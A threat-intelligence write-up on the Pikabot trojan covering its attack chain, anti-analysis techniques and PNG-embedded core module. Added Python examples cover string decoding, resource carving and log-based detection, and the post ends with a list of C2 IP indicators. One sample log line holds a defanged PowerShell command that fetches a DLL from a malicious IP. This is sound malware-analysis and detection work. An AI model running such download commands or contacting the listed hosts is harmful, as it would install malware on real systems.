New Variants of Pikabot in 2023

New threats emerge regularly in our space, challenging the preparedness of organizations worldwide. One such recent threat is Pikabot, a new and sophisticated trojan that first appeared in early 2023. Cybertooth Security has been closely monitoring and analyzing Pikabot to understand its mechanisms and its impact on victims. In two cases, Pikabot was observed using Cobalt Strike to exfiltrate data from the victim and to load ransomware encryption scripts that silently delete history and any backups found on the host. Most infections lead to reconnaissance commands such as “whoami” and “ipconfig”, which let the operators get their bearings on the infected system.

Criminal Use

Pikabot’s Composition and Functionality

Pikabot is structured into two main components: a loader and a core module. The loader initiates the infection and performs numerous anti-analysis checks to evade detection, including anti-debugging, anti-VM, and anti-emulation techniques. The core module, once injected, can execute arbitrary commands and payloads received from a command-and-control (C2) server, which makes it a powerful tool for cybercriminals.

Attack Chain

Initial Infection: JS & PowerShell

  • Methods: Infection begins with a link in a malicious email that downloads a JS file, which in turn downloads the Pikabot DLL. The script is padded with comments copied from MIT-licensed open-source projects so that it appears legitimate.
  • Analysis: Utilizing PowerShell logging and transcript logging revealed the malware’s initial script and subsequent decoded version.

Second Stage: Pikabot Loader

  • Unpacking: The final payload is unpacked using tools like unpacme and unpacker.
  • Functions: Manipulation of the DLL leads to the main malware function, which performs API resolution and string decryption.
  • API Resolution: Pikabot dynamically resolves key functions such as GetProcAddress and LoadLibraryA, which it then uses to locate the remaining APIs it needs.

String Decryption

  • Methods: Strings are built on the stack and decoded with bitwise operations. The recurring pattern is: construct the stack string from immediates, run a decode loop over it, then compare the result against a hardcoded length.
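The following is an added example, not code from the original post or from Pikabot itself. It models the stack-string pattern just described: DWORD immediates are reassembled in stack order, a short decode loop runs over exactly the number of bytes given by the hardcoded length, and the result is sanity-checked. The transform (XOR with a rolling 3-byte key followed by a one-bit rotate) and the key are assumptions chosen for illustration; the two API names come from the post.

```python
import struct

# Added example modelling the stack-string pattern. The XOR-plus-rotate transform
# and the key are assumptions for illustration, not Pikabot's actual routine.

def words_to_bytes(words):
    """Reassemble the buffer from the 32-bit immediates written to the stack (little-endian)."""
    return b"".join(struct.pack("<I", w) for w in words)

def bytes_to_words(data):
    """Split a buffer into DWORD immediates in stack order, zero-padding the tail."""
    data = data + b"\x00" * (-len(data) % 4)
    return [struct.unpack("<I", data[i:i + 4])[0] for i in range(0, len(data), 4)]

def decode_loop(buf, key):
    """Per-byte decode loop: XOR with the rolling key, then rotate right by one bit (assumed)."""
    out = bytearray()
    for i, b in enumerate(buf):
        x = b ^ key[i % len(key)]
        out.append(((x >> 1) | (x << 7)) & 0xFF)
    return bytes(out)

def encode_for_stack(plaintext, key):
    """Inverse of decode_loop; used only to construct the sample input below."""
    out = bytearray()
    for i, b in enumerate(plaintext):
        r = ((b << 1) | (b >> 7)) & 0xFF  # rotate left by one bit
        out.append(r ^ key[i % len(key)])
    return bytes(out)

def decode_stack_string(words, key, hardcoded_len):
    """Decode exactly hardcoded_len bytes, mirroring the loop bound the sample compares
    against, then check the result so a wrong key or length guess fails loudly."""
    buf = words_to_bytes(words)
    if hardcoded_len > len(buf):
        raise ValueError("hardcoded length %d exceeds the %d bytes on the stack"
                         % (hardcoded_len, len(buf)))
    plain = decode_loop(buf[:hardcoded_len], key)
    if not all(0x20 <= c < 0x7F for c in plain):
        raise ValueError("decoded bytes are not printable ASCII: wrong key or length")
    return plain.decode("ascii")

def is_rejected(words, key, hardcoded_len):
    """True if decode_stack_string refuses the (key, length) guess."""
    try:
        decode_stack_string(words, key, hardcoded_len)
    except ValueError:
        return True
    return False

KEY = b"\x5a\xc3\x11"  # assumed key

# Constructed sample: two API names the post says Pikabot resolves, encoded as the
# DWORD immediates that would appear in the disassembly, paired with their lengths.
SAMPLE = {name: (bytes_to_words(encode_for_stack(name.encode(), KEY)), len(name))
          for name in ("GetProcAddress", "LoadLibraryA")}

def decode_all(sample=SAMPLE, key=KEY):
    """Decode every sample string; returns the sorted plaintexts."""
    return sorted(decode_stack_string(words, key, n) for words, n in sample.values())

if __name__ == "__main__":
    for name, (words, n) in SAMPLE.items():
        print(" ".join("0x%08x" % w for w in words), "->", decode_stack_string(words, KEY, n))
```

When applying this to a real sample, the immediates, the key and the loop body come from the disassembly; the length check and the printable-ASCII check are what catch a mis-identified loop before bad strings end up in the report.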

Anti-Analysis Techniques

  • Pikabot performs extensive anti-debugging checks, including exception-handler tricks, debug-flag checks, hardware-breakpoint detection, and many others.
  • Noted Anti-VM Tactics: It attempts to load non-existent (incorrect) library names, a technique that exposes sandboxes and VMs that fake such requests.

Extracting the Core Module

  • Extraction Process: The core module is split across multiple PNG files in the resource section; the pieces are reassembled and decrypted using XOR and AES.
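The block below is an added example, not the post’s or Pikabot’s code. It shows the carving workflow for a core module spread over several PNG resources: walk each PNG’s chunks (verifying CRCs), pull the fragment out of a private chunk, concatenate the fragments in resource order, strip an XOR layer, and refuse the result unless an MZ header appears. The private chunk type, the key and the fragment layout are assumptions; the AES stage the post mentions is deliberately left out because its key material would have to be recovered from the sample.

```python
import struct
import zlib

# Added example. CARRIER (the private chunk type), KEY and the fragment layout are
# assumptions for illustration; only the XOR layer is modelled, not the AES stage.

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CARRIER = b"prVt"  # assumed private ancillary chunk that carries one fragment per PNG

def make_chunk(ctype, payload):
    """Build a PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def png_chunks(data):
    """Walk the chunks of a PNG, checking each CRC as a real decoder would."""
    if data[:8] != PNG_SIG:
        raise ValueError("missing PNG signature")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in chunk %r" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break

def build_carrier_png(fragment):
    """Constructed sample: a valid 1x1 greyscale PNG that smuggles `fragment` in a private chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour, comp, filter, interlace
    idat = zlib.compress(b"\x00\x00")  # one filter byte plus one pixel
    return (PNG_SIG + make_chunk(b"IHDR", ihdr) + make_chunk(CARRIER, fragment)
            + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b""))

def xor_layer(data, key):
    """Rolling-key XOR; its own inverse, so it both encrypts the sample and decrypts it."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def extract_core(resources, key):
    """Join the fragments from each PNG in resource-ID order, remove the XOR layer,
    and insist on an MZ header before trusting the result."""
    blob = b"".join(payload for png in resources
                    for ctype, payload in png_chunks(png) if ctype == CARRIER)
    core = xor_layer(blob, key)
    if core[:2] != b"MZ":
        raise ValueError("no MZ header after XOR: wrong key, wrong resource order, or another layer remains")
    return core

def rejects(resources, key):
    """True if extract_core refuses these resources with this key."""
    try:
        extract_core(resources, key)
    except ValueError:
        return True
    return False

KEY = b"\x13\x37\xc0\xde"  # assumed key
FAKE_CORE = b"MZ\x90\x00" + b"constructed core-module placeholder " * 3  # stands in for the real DLL

def build_sample_resources(core=FAKE_CORE, key=KEY, parts=3):
    """Split the XOR-encrypted core across `parts` carrier PNGs, as the loader's resources would."""
    enc = xor_layer(core, key)
    step = -(-len(enc) // parts)  # ceiling division
    return [build_carrier_png(enc[i:i + step]) for i in range(0, len(enc), step)]

if __name__ == "__main__":
    res = build_sample_resources()
    print(len(res), "PNG resources ->", len(extract_core(res, KEY)), "bytes of core module")
```

The CRC check matters in practice: a resource that was patched or truncated on disk shows up as a CRC failure rather than as silently wrong bytes, and the MZ check catches the two common mistakes, a wrong key and resources concatenated in the wrong order.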

Indicators of Compromise (IoCs)

  • URLs & IPs: Several URLs and IPs, such as 192.229[.]211.108, were stored in the script’s variables.
  • Executed Commands: rundll32 is used to execute the DLL.
  • Mutex: A specific mutex value is used to prevent double infection.

Note: This summary is based on the detailed analysis and technical breakdown of Pikabot malware. The information is synthesized to provide a clear understanding of its attack chain and methodologies.

Pikabot’s Unique Mechanisms

What sets Pikabot apart is how it encrypts and stores its C2 information while maintaining a backdoor, as noted by Sophos. Unlike earlier malware such as Qakbot, Pikabot does not store its C2 information in a single block. Instead, each component is encrypted with the ADV obfuscator tool, and the C2 server IP addresses and ports are decoded at runtime by a complex algorithm.

Impact and Scale of Infections

Cybertooth Security has observed that Pikabot has been actively used to distribute secondary payloads like Cobalt Strike, indicating its role in multi-staged attack campaigns that could lead to ransomware. The exact scale of Pikabot infections remains challenging to ascertain due to its sophisticated evasion techniques. However, the similarities in its distribution methods to those of the Qakbot trojan suggest a potential for widespread impact.

Conclusion

Pikabot represents a significant and evolving challenge in the field of cybersecurity. Its sophisticated design, combined with advanced evasion techniques, makes it a formidable threat. Cybertooth Security emphasizes the importance of continuous monitoring, analysis, and strengthening of cyber defenses to counteract threats like Pikabot. As the malware continues to evolve, staying ahead in the cybersecurity game is more crucial than ever.

IP IOCs

102.129.139.65
104.238.144.171
109.107.182.10
112.17.156.233
129.153.135.83
144.172.126.136
144.64.204.81
158.247.215.68
185.87.148.132
196.218.123.202
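To make the indicators above usable, here is an added detection example, not code from the post or from any vendor tooling. It runs three rules over constructed Sysmon-style and PowerShell script-block log lines: a match against the IP IOCs listed in this post (refanging the 192.229[.]211.108 form first), rundll32 executing a DLL from a user-writable path, and rundll32 connecting on a port other than 80 or 443 (T1571 in the ATT&CK mapping). The log lines, the field layout and the two rundll32 heuristics are assumptions; the IP list is the post’s.

```python
import re

# Added example. The log lines below are constructed, not real telemetry, and the
# rundll32 path/port heuristics are assumptions; the IP list comes from this post.

PIKABOT_IPS = frozenset({
    "102.129.139.65", "104.238.144.171", "109.107.182.10", "112.17.156.233",
    "129.153.135.83", "144.172.126.136", "144.64.204.81", "158.247.215.68",
    "185.87.148.132", "196.218.123.202", "192.229.211.108",
})

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
IMAGE_RE = re.compile(r"Image=(.*?)\s+\w+=")       # Image= value up to the next key=
PORT_RE = re.compile(r"DestinationPort=(\d+)")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")  # assumed heuristic
EXPECTED_PORTS = {80, 443}

def refang(text):
    """Undo the usual defanging so indicators pasted from reports or scripts still match."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def rundll32_target(line):
    """Return the DLL argument of a rundll32 command line (CommandLine= field), else None."""
    _, sep, cmd = line.partition("CommandLine=")
    if not sep:
        return None
    parts = cmd.strip().replace('"', "").split()
    if len(parts) < 2:
        return None
    exe = parts[0].lower()
    if not (exe.endswith("rundll32.exe") or exe.endswith("rundll32")):
        return None
    return parts[1].split(",", 1)[0]  # drop the ",ExportName" part

def classify(line):
    """Return the sorted list of detection tags that fire on one log line."""
    tags = set()
    plain = refang(line)
    if any(ip in PIKABOT_IPS for ip in IPV4_RE.findall(plain)):
        tags.add("ioc_ip")
    target = rundll32_target(plain)
    if target and any(tok in target.lower() for tok in USER_WRITABLE):
        tags.add("rundll32_user_path")
    img, port = IMAGE_RE.search(plain), PORT_RE.search(plain)
    if (img and port and img.group(1).lower().endswith("rundll32.exe")
            and int(port.group(1)) not in EXPECTED_PORTS):
        tags.add("rundll32_nonstd_port")
    return sorted(tags)

def scan(lines):
    """(line number, tags) for every line that triggers at least one rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            hits.append((n, tags))
    return hits

# Constructed sample lines in a Sysmon / PowerShell 4104 style.
SAMPLE_LOGS = [
    r"Event 1 ProcessCreate Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe C:\Users\alice\AppData\Local\Temp\update.dll,Crash",
    r"Event 3 NetworkConnect Image=C:\Windows\System32\rundll32.exe DestinationIp=185.87.148.132 DestinationPort=2222",
    r"Event 4104 ScriptBlockText=$u='hxxp://192.229[.]211.108/d/ret.dll'; iwr $u -OutFile $env:TEMP\update.dll",
    r"Event 3 NetworkConnect Image=C:\Program Files\Mozilla Firefox\firefox.exe DestinationIp=93.184.216.34 DestinationPort=443",
    r"Event 1 ProcessCreate Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
]

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOGS):
        print("line %d: %s" % (n, ", ".join(tags)))
```

The last sample line is the benign control: rundll32 loading a system DLL produces no hit, which is the behaviour you want before turning the path heuristic into an alert. IP indicators age quickly, so treat the address match as the weakest of the three rules and keep the rundll32 behaviour rules even after the listed IPs go stale.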

MITRE ATT&CK:

Tactics
  • TA0002 Execution
  • TA0003 Persistence
  • TA0004 Privilege Escalation
  • TA0005 Defense Evasion
  • TA0006 Credential Access
  • TA0007 Discovery
  • TA0009 Collection
  • TA0011 Command and Control

Techniques
  • T1129 Shared Modules
  • T1574 Hijack Execution Flow
  • T1547.001 Registry Run Keys / Startup Folder
  • T1574.002 DLL Side-Loading
  • T1055 Process Injection
  • T1027 Obfuscated Files or Information
  • T1036 Masquerading
  • T1112 Modify Registry
  • T1218 System Binary Proxy Execution
  • T1218.010 Regsvr32
  • T1218.011 Rundll32
  • T1497 Virtualization/Sandbox Evasion
  • T1056 Input Capture
  • T1057 Process Discovery
  • T1082 System Information Discovery
  • T1083 File and Directory Discovery
  • T1518 Software Discovery
  • T1518.001 Security Software Discovery
  • T1571 Non-Standard Port
